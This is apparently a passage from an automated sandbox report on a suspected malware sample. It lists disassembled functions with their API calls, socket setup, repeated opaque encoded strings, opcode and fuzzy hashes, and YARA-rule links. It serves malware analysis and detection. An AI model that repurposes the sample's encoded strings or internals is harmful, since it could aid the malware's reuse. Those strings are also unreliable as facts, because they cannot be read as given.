                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402ADF, 00402AE4, 00402AEC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: 44be1de7a8d384f996373de7ea25d3626032e1aee62c942ca898debcaf7ec6e9
                                                                                                                                                        • Instruction ID: 19d0d01f61a9806516b775edb218aaa8f2555b6eb18f54f3ac5d31e0f9756bd6
                                                                                                                                                        • Opcode Fuzzy Hash: 44be1de7a8d384f996373de7ea25d3626032e1aee62c942ca898debcaf7ec6e9
                                                                                                                                                        • Instruction Fuzzy Hash: 1CC04C2299E53039258832583947CFF414E8D95321356066FB510652D26D891D8303BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040CA8F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040CA96
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040CA90, 0040CA95, 0040CA9D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: 3a28f27260e22ffebbdbc56f216e85408a7c79372aed592854c8a000160ec491
                                                                                                                                                        • Instruction ID: 50aea12ab7217c85875e93edddf42a33e5242cb7fa0053465ea6f83f72e45d1b
                                                                                                                                                        • Opcode Fuzzy Hash: 3a28f27260e22ffebbdbc56f216e85408a7c79372aed592854c8a000160ec491
                                                                                                                                                        • Instruction Fuzzy Hash: 42C04C5299E5312D258432593847CEB418E8D96721366066FB510652816D895D8202BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040AB22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040AB29
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040AB23, 0040AB28, 0040AB30
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: 1e37309bfdf9b58c726f42260b2641069b88cce1b9eda629a8c99f34b5d79385
                                                                                                                                                        • Instruction ID: 43cab7890649f054a47b2bc93dee9b30beab715973e6038e5b8c84570af30f19
                                                                                                                                                        • Opcode Fuzzy Hash: 1e37309bfdf9b58c726f42260b2641069b88cce1b9eda629a8c99f34b5d79385
                                                                                                                                                        • Instruction Fuzzy Hash: 34C04C6299E53029258432693857CEB418E8D96721366066FB510A51816D895DC206FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00408FF7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00408FFE
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52, xrefs: 00408FF8, 00408FFD, 00409005
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: ebba116b07da4cb63ae5330e63a497464cfbf18e8141362aa9edbfc053a5432f53038ca51cddf3fb227e77cd9a9f96526063757ecda6dd0e16f8dd4421c3d9ff9876c167e905bc7b3b6099c9c15bed52
                                                                                                                                                        • API String ID: 4000879885-3554950924
                                                                                                                                                        • Opcode ID: 49c171211b442eaee5277dec39eb1c1538f8e12c59b6c8cf7cab165f77c98f3c
                                                                                                                                                        • Instruction ID: 19e5cd4c9101d485457a74f9c4a2af279fc273147af9bdeb1d29b24af605e6af
                                                                                                                                                        • Opcode Fuzzy Hash: 49c171211b442eaee5277dec39eb1c1538f8e12c59b6c8cf7cab165f77c98f3c
                                                                                                                                                        • Instruction Fuzzy Hash: 29C08C228AE43029208432183C03CEB018E8D52320311066FB400615852C881D8302BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040521D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00405224
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040521E, 0040522B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: cbafb4b0c6ad5b3ae9c77a6d912231d0908f7bbe0bc27e9db6bf9162175f0392
                                                                                                                                                        • Instruction ID: f953d3ba83e9c61bf668341f8d5529855eb5e0f6396ae51d5eabf50c27b7e5dc
                                                                                                                                                        • Opcode Fuzzy Hash: cbafb4b0c6ad5b3ae9c77a6d912231d0908f7bbe0bc27e9db6bf9162175f0392
                                                                                                                                                        • Instruction Fuzzy Hash: FAC04C1299E5312D29843268384BCEF814E8DA672135606BFB910651856D991D8307BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00403451, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00403458
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403452, 0040345F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: 239aa97a149c298bcddce0c17363e83cfb540a90d3ead47a6d73e8fe58061f9d
                                                                                                                                                        • Instruction ID: 1d407cf676fe65f5fa3b04d2d1b0ecab92e22796acd6b5c4fb2f486a1eb71f36
                                                                                                                                                        • Opcode Fuzzy Hash: 239aa97a149c298bcddce0c17363e83cfb540a90d3ead47a6d73e8fe58061f9d
                                                                                                                                                        • Instruction Fuzzy Hash: 70C04C2299E63029258832593847CEB414E8EA632135606AFB910A62826D8A1D8342BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040998C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00409993
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040998D, 00409992, 0040999A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: 67da858ff909a07a930796f5cad33727bcbe3af8f6bfc321d3a77d1d35f28c35
                                                                                                                                                        • Instruction ID: 453e5ca70e0b69a53aa24788dd678cbf8d7b1b1894e7a45f0c91ea3ebedce348
                                                                                                                                                        • Opcode Fuzzy Hash: 67da858ff909a07a930796f5cad33727bcbe3af8f6bfc321d3a77d1d35f28c35
                                                                                                                                                        • Instruction Fuzzy Hash: F0C04C1299E570292585325D3847CEF414E8D95721356066FB524661816D995D8202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040BF5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040BF61
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040BF5B, 0040BF60, 0040BF68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: 06e0fc46f73e5027ce9b4b918a71e9f9519f99ed66c745b8e0d8fe3fcd7ee10d
                                                                                                                                                        • Instruction ID: 57abd5afa87cd70e942503ec36f064c1533b8acb3f8ebe9cdf5d858a127a108f
                                                                                                                                                        • Opcode Fuzzy Hash: 06e0fc46f73e5027ce9b4b918a71e9f9519f99ed66c745b8e0d8fe3fcd7ee10d
                                                                                                                                                        • Instruction Fuzzy Hash: BBC04C5299E53029298436583847CEF414E8D96721356067FB511651816D895DC206BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041D156, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D1BB
                                                                                                                                                        • __Thrd_sleep.LIBCPMT ref: 0041D1E9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thrd_sleepUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2189147043-0
                                                                                                                                                        • Opcode ID: 1df55a44b8ecc8ffdf42362aa0ae94707fae95105600284d7baffd79a99a804a
                                                                                                                                                        • Instruction ID: e3f51021e9b5944bc9c68dc0f59b277c80080e10fcff91de3f204057302c160c
                                                                                                                                                        • Opcode Fuzzy Hash: 1df55a44b8ecc8ffdf42362aa0ae94707fae95105600284d7baffd79a99a804a
                                                                                                                                                        • Instruction Fuzzy Hash: 93112771504310ABC710EF258C81B5B7ADDEFCA754F04472EF548AA151D674998187D9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425A4A, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3890610498-0
                                                                                                                                                        • Opcode ID: 6cc548c9f54389337810fb75b9c9f4a57bd449ccd751776476083a60d2de3514
                                                                                                                                                        • Instruction ID: dc862a2d03cc3f71ab76be67901b734b1f4fef0da75b0bebcc24139a1b815b5b
                                                                                                                                                        • Opcode Fuzzy Hash: 6cc548c9f54389337810fb75b9c9f4a57bd449ccd751776476083a60d2de3514
                                                                                                                                                        • Instruction Fuzzy Hash: E2110871300619ABDB118F54EC86BAA7B25FF54321F904207FE11862D1C778DC21DBD4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00421E0C, Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00421E11
                                                                                                                                                        • new.LIBCMT ref: 00421E2E
                                                                                                                                                          • Part of subcall function 004212CA: __EH_prolog.LIBCMT ref: 004212CF
                                                                                                                                                          • Part of subcall function 004212CA: std::_Lockit::_Lockit.LIBCPMT ref: 004212E1
                                                                                                                                                          • Part of subcall function 004212CA: std::exception::exception.LIBCONCRT ref: 00421336
                                                                                                                                                          • Part of subcall function 004212CA: __CxxThrowException@8.LIBVCRUNTIME ref: 00421353
                                                                                                                                                          • Part of subcall function 004212CA: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042135C
                                                                                                                                                          • Part of subcall function 00421DB9: __EH_prolog.LIBCMT ref: 00421DBE
                                                                                                                                                          • Part of subcall function 00421DB9: __Getctype.LIBCPMT ref: 00421DE4
                                                                                                                                                          • Part of subcall function 0042137B: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004213A3
                                                                                                                                                          • Part of subcall function 0042137B: std::_Lockit::~_Lockit.LIBCPMT ref: 0042142F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$H_prolog$Locinfo::_Lockit$Exception@8GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 351950641-0
                                                                                                                                                        • Opcode ID: 50ab8adea69986703150a3d4a96825dded799432dd713134678456aac5296a67
                                                                                                                                                        • Instruction ID: fcd44e31cc3cbc786fd0eca0a4cff6963f9cb1f1a77067bb6eb4268bfa44bab1
                                                                                                                                                        • Opcode Fuzzy Hash: 50ab8adea69986703150a3d4a96825dded799432dd713134678456aac5296a67
                                                                                                                                                        • Instruction Fuzzy Hash: AE01A1B1A00218DBDB10EFA9E881ADEBB74FF64720F60466FE415A7291C7740B01C794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041510B, Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateIoCompletionPort.KERNELBASE(?,?,00000000,00000000), ref: 0041511E
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00415128
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompletionCreateErrorLastPort
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 826170474-0
                                                                                                                                                        • Opcode ID: 1c7ee15dbfd1503bf6760d0490cb15ff35d498051381d9f937e43fc4ee977736
                                                                                                                                                        • Instruction ID: c1263357b05867d2733bc16997838d1f3c7cee8441f252a4f277bc4f25832a2c
                                                                                                                                                        • Opcode Fuzzy Hash: 1c7ee15dbfd1503bf6760d0490cb15ff35d498051381d9f937e43fc4ee977736
                                                                                                                                                        • Instruction Fuzzy Hash: 73018471D01508BF8B01DFA9984499FBFBAEE86354B24407AFC04D7301D6758E058BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00697DEC, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 00697E0D
                                                                                                                                                          • Part of subcall function 00697D9E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003), ref: 00697DD0
                                                                                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004), ref: 00697E49
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap$_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1482568997-0
                                                                                                                                                        • Opcode ID: 04a8543df98c1afc54205b475926a2bbd36f3b140ae5f5a500211b3eeb4583ca
                                                                                                                                                        • Instruction ID: f8535ded6fffde4913784612010553652d5cd73433143d5cc38e89247a84afd7
                                                                                                                                                        • Opcode Fuzzy Hash: 04a8543df98c1afc54205b475926a2bbd36f3b140ae5f5a500211b3eeb4583ca
                                                                                                                                                        • Instruction Fuzzy Hash: 51F0963252961666CF212B259C02BBB275F9FD1B71B25409EF8199AE91EB20CC1291A8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415DA9, Relevance: 3.0, APIs: 2, Instructions: 38networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415DBC
                                                                                                                                                        • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00415DEF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Socketsetsockopt
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4073417641-0
                                                                                                                                                        • Opcode ID: 57d7dbeec8d167821e799577697ec5d73d98e76d53c9775f6d16ba8d974a0e8c
                                                                                                                                                        • Instruction ID: e7609cce014b81f21ff3b1dd31470b4c38d175c626fe43516bd185cf584de9ae
                                                                                                                                                        • Opcode Fuzzy Hash: 57d7dbeec8d167821e799577697ec5d73d98e76d53c9775f6d16ba8d974a0e8c
                                                                                                                                                        • Instruction Fuzzy Hash: 3AF0E23A651718BBEA3056189C4AFEE7769C789B31F104217FE20A72C0C6F45E4186E9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040F4DA, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
